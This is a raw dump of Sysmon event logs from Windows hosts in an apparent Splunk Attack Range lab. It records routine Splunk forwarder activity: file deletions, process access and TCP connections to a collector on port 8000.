Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081764Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.467{2FDD8D40-B2C4-615A-5501-00000000FD01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081763Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:36.419{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27D4174A754B747007B23B42860B91A1,SHA256=3C292274DC16F3F21A164C904D9A241EFCC47C5A19BD14E256AB1192ED0B818B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103873Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:36.422{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49556-false10.0.1.12-8000- 23542300x8000000000000000103872Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:37.451{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=783201E36858AA2E7F45ED44BEAFE918,SHA256=6B3435D860EC8E7E3CA919EC3E8CFA78D25CF88FA13356496BE60289DD3B9279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081779Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:37.419{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E34BC2B4E452DEF9138A36D984682ED,SHA256=1CF663D2C439D3795E141ECD299D10CC1F6496419E63ABF116A249CAAE94D8E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081781Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:38.419{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4390D1CCF0A34E5854A0C5908254F9A5,SHA256=F60966BF4957E720900C4271252A98FDA6EEFE9E6FEE7320AFE715FAA0039718,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103874Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:38.451{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B3ECCC43AC293CD8C935E06B832BB2,SHA256=05F223AC090E1D4B7D74EF877D9B21B2D9FEAF10FA5D8F47CD5F24740423E0E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081780Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.596{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50051-false10.0.1.12-8000- 23542300x800000000000000081782Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:39.419{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71942E01FC91F0D94D923351147D331,SHA256=D06B08B6BC485B5929768D7F335748DD4CFDF2F2C44C802EB9E0C357107CF8C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103875Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:39.451{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51141BC07696BC1CDFA1A1B8BB6FB917,SHA256=B305303CEE5BE70FA17F88CA31FD183045B5FE3F78F443F764477047A96EF287,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103876Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:40.467{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE26869733A61730A616FC37B685838D,SHA256=367510EB8D461BC0453E9E1C19EB699FA799C3098D90C17B1DBA6A6F87293080,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081783Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:40.419{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=906C1557F8C204C885CFDD192B6D92F7,SHA256=102C73C2AB90AC945A2E9985BB3469B86E417814BB932BED56610BC90CC5B034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103877Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:41.498{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A623DB47F22E18A8CE257671DE895563,SHA256=FD2A3546702C6D3F93EDD9EE1A1F553BE56D66230E7FF393A95E9D37E03BBFB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081784Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:41.419{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8B8ED3CD35CAEC9B1D81F57A526C5F3,SHA256=FF70CA8746CF9B4397DC4AF9FEA6EB008B0BD6C1A7519A918DE7C35674387DEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081785Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:42.419{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E4C7EA280537AB3135B6CB42493258D,SHA256=94AB73F668B3FF8B7BAFCD021644B4BE2930F6DECD6017A8535C6125CC483DC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103879Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:41.438{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49557-false10.0.1.12-8000- 23542300x8000000000000000103878Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:42.498{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B801960104EB1FBD897CFDD80FF3628,SHA256=73A15FAF086A773BCA91E44DA86E19918F91908FAF954FD96B629B6B2C25086C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081786Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:43.419{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0916AABDDE23A84203DDA338D0E992B5,SHA256=84347A1A2DE08C0129DE995FE6DEF01109BBFE34BC7B407C32CB4D3A8A91A43D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103880Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:43.514{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBA7F1F1799407937BA0636A1F5E8798,SHA256=31079128F2D631265DD70DDBBA5FD72AF1DC6F91AC9655A4C9F8B23C84B6303A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103881Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:44.514{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=750F14405306E7FCDCF63DB22C3F4C69,SHA256=14AE698C5A409D4A72CDE94E7ECD0245817FE5FD30B91FD75C0CF74C06E93292,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081788Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:41.627{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50052-false10.0.1.12-8000- 23542300x800000000000000081787Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:44.466{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B4BE64EDAA0AFED3E862D74BA2F11E9,SHA256=DAF8559F8C37E9DAF37F815165C0948C9109B8B26230D9E404BC64F421FCCB84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103882Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:45.529{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB8AF74DADB302681CEBA04C742B20C5,SHA256=7DF207BFB581F071EE743ACF5E04882D7B8E3CE71206F8430940E2A366047AC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081789Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:45.466{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17B6BC0EFEB666ECDC7A3606C1E70183,SHA256=DEDEF89E148A368A16AFF86081E2B1F9C36A2189469598A8C1B2337D2947BF95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081790Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:46.528{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46916CBC96903DC54E910466F0811DEA,SHA256=9D205895776A8BB378B5EC6453C654481AE8DD027B9508FB7C46E51BA102B5F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103883Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:46.545{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649AF7305EEE26B86B6AB9C4918ACA2C,SHA256=70E1D8AB6DC9F2645FC56C6EA0D3A12E3BEC61179DD5C6BB069F9062CF37C2C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081791Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:47.684{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6442E30C0C1B291B17DE803FFDF888D0,SHA256=358ACB7BA954E6CCE07B2D826B4C179B5DEC39746D78C5556CD87F9D3B26A9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103884Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:47.576{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27E8B5C141954ED2D6569DB0C31CA5D0,SHA256=8D8A2B929071F9B8D66FAE9805FB527041ED75B7301567E81F38D99505DA06B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081792Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:48.809{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED6EA144001E388DAAEA6E83C64E34E6,SHA256=A46B895161A9DD68C274C71F90B4FB4C027C3ED4117850CBE8FB5855B07922F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103885Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:48.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42028285E183B8C4CA8F4A4219F92744,SHA256=2ABD2AF3760254776C2526366B6A597BD807F9C1BB219E19362708111813CCF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081794Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:49.950{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0DF5968A1C559995ADA8B53C679A69,SHA256=349CDA5C5B85A4E547788A20ACD4902A6FD303EF034CBDCD4B0CAC5D2224FCC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103887Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:49.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2815305B778A83F1FD00310A161DE650,SHA256=7EC95D5957D2AB94F4DB736FABBEE9EA4E75072CF682B5DA1122BEE29075CBA7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081793Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:46.643{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50053-false10.0.1.12-8000- 354300x8000000000000000103886Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:47.453{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49558-false10.0.1.12-8000- 23542300x8000000000000000103888Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:50.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC097EC3AAA79340039B150E9F15F17C,SHA256=EC65807F7B01936C51A0F99396CDE1643AA4152B92A57445772BF8E93F20C733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103889Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:51.607{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=187B714BE4D7B2984520EB6598F3B9A6,SHA256=715ED50EF34CA70A746166856A02231156A307619C71B046FF5C918535D1667B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081795Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:51.044{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1254B9A5549D2F3D75E85D2498FA4D5,SHA256=6EDCF36DDD24A76D33ADB8AC0E02F6CB0882922F976E5370C9855140C7164448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103890Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:52.623{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A7108EC72E22AABBD11116481A9E286,SHA256=ADAF46088763750E4094BF46CB186111AEA5543706DFF560ABC9A22D6B48D47F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081796Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:52.122{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=423CC5449470B76ABE49E00505C2B3B1,SHA256=7CAE312DB72DE481A75712573B8F408AF5CDBF10A63C76CA7BD864439DD76A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103891Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:53.654{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44498B76E907EF533E7C746CE8AC0AD5,SHA256=8EBD368DB61C5AB25138053DD17EB9315573108055CCA715C28C9059B4E77F60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081797Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:53.356{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=769D07468DB8B85B78E2B9DB677F44CC,SHA256=5202878E5C440B69D09842CF69CAE42871BFEBFE170E55D75D4EE1E92A6BD57F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081799Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:54.372{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A06F533E88CA7BAAEAD393FF92370D9,SHA256=5382ABAE1E550217129BF963C089D13D6828F63928C57CF844A2142FF5AD8A2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103892Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:54.670{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A4BBB51E7FEF09070B20FE60DA31830,SHA256=836046D8BECE01F81F2AA1E0266F920983616240E576F67711E075B226FFC734,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081798Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:51.815{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50054-false10.0.1.12-8000- 23542300x8000000000000000103894Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:55.685{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5AE47E47021A7868E5865DAC2B552D0,SHA256=2D6A510F75169F30863BB118554716354BC4F49DF0784AC1DCB55888B9A63150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081800Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:55.403{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246C3C6BBF7911834BC504FA6829F438,SHA256=C3F206B7F178432015815348209F5AEA1FBAC75968166BF3CDF9AD3571C4E958,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103893Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:53.313{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49559-false10.0.1.12-8000- 23542300x8000000000000000103896Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:56.857{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103895Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:56.686{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0AB11DEF5024D0789B4915EDF1DDD87,SHA256=34FC4EC2E0737B3A64AB7F6C98B9AA092ABC0A47EB066D70353B6ACC90C599C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081801Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:56.418{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 